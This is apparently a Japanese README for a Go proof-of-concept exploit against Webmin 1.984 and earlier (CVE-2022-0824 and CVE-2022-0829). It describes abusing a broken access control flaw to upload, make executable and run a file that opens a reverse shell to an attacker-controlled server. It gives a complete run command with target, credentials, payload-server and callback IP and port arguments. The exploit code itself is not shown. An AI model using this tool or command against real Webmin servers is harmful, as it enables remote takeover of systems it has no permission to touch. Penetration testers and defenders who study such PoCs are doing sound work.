
CVE-2022-0824 のエクスプロイト PoC
Webmin <= 1.984 における RCE
CVE-2022-0824 および CVE-2022-0829
これは Webmin の BAC 脆弱性を悪用して、悪意のあるファイルをアップロードし、 そのファイルのパーミッションを変更した上で実行します。 makePayload 関数で作成されるこのファイルは、攻撃者が制御するサーバーへの リバースシェルです。
go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444
t -> ターゲット URL
c -> Webmin の認証情報
sl -> ペイロードをホストするローカルサーバーの IP とポート
s -> コールバック IP
p -> コールバックポート
https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824